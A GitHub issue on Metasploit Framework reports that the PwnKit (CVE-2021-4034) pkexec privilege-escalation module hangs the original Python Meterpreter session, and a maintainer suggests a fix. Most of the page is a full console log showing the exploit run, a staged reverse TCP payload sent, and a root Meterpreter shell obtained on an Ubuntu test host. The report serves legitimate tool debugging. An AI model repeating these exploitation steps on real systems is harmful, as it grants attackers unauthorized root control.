You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In testing the LPE here rapid7/metasploit-framework#16312 using a python payload the exploit succeeds but then timeout errors are generated. It appears to fail while crashing the original session.
After turning on debugging and watching, the thing that's happening is that the session freezes after the cmd_exec call. All commands after the cmd_exec fail with timeout errors. If you go back to the original (not root) session, all commands give timeout error.
If you go into the new root session, it works fine, and if you exit the new root session, then the original session becomes operative again.
Example:
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.101:6578
[*] Sending stage (39920 bytes) to 10.5.132.108
[*] Meterpreter session 1 opened (10.5.135.101:6578 -> 10.5.132.108:46922 ) at 2022-03-08 18:29:21 -0600
msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ubuntu-18041
OS : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lhaqxua
[*] /tmp/.lhaqxua created
[!] Verify cleanup of /tmp/.lhaqxua
[*] Running python3 /tmp/.lhaqxua/.qmnpurhmhd /usr/bin/pkexec /tmp/.lhaqxua/dhuyrf/dhuyrf.so dhuyrf tekeajpcudd
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “tekeajpcudd”
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
[+] The target is vulnerable.
[*] Detected architecture: x86_64
[*] Detected payload arch: x64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.xlkdwwcadpyd
[*] /tmp/.xlkdwwcadpyd created
[*] Writing '/tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.xlkdwwcadpyd
[*] Running python3 /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr /usr/bin/pkexec /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so aagpbnlvb brxphinvsj
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.132.108
[+] Deleted /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so
[+] Deleted /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr
[+] Deleted /tmp/.xlkdwwcadpyd
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.132.108:39786 ) at 2022-03-08 18:30:10 -0600
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/.lhaqxua/.qmnpurhmhd: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) >
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -v
Active sessions
===============
Session ID: 1
Name:
Type: meterpreter linux
Info: msfuser @ ubuntu-18041
Tunnel: 10.5.135.101:6578 -> 10.5.132.108:46922 (10.5.132.108)
Via: exploit/multi/handler
Encrypted: Yes (AES-256-CBC)
UUID: f36f2c5a2e1bd403/python=20/linux=6/2022-03-09T00:29:20Z
CheckIn: 64s ago @ 2022-03-08 18:30:24 -0600
Registered: No
Session ID: 2
Name:
Type: meterpreter linux
Info: root @ 10.5.132.108
Tunnel: 10.5.135.101:4444 -> 10.5.132.108:39786 (10.5.132.108)
Via: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
Encrypted: Yes (AES-256-CBC)
UUID: 59461ffc33ffa15f/x64=2/linux=6/2022-03-09T00:30:10Z
CheckIn: 18s ago @ 2022-03-08 18:31:10 -0600
Registered: No
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 10.5.132.108
OS : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.5.132.108 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: Python exception: FileNotFoundError
meterpreter > cd ~
meterpreter > sysinfo
Computer : ubuntu-18041
OS : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
The text was updated successfully, but these errors were encountered:
I haven't replicated this yet, but it resembles an issue Simon and I fixed within shell_to_meterpreter, which also used cmd_exec
TL;DR There's now a new Channelize option on cmd_exec to specify that the process should be executed, but to not wait around to buffer the stdout/stderr output back to msfconsole. That might fix the might be a solution for this exploit as well 🤞
In testing the LPE here rapid7/metasploit-framework#16312 using a python payload the exploit succeeds but then timeout errors are generated. It appears to fail while crashing the original session.
After turning on debugging and watching, the thing that's happening is that the session freezes after the
cmd_exec
call. All commands after thecmd_exec
fail with timeout errors. If you go back to the original (not root) session, all commands give timeout error.If you go into the new root session, it works fine, and if you exit the new root session, then the original session becomes operative again.
Example:
The text was updated successfully, but these errors were encountered: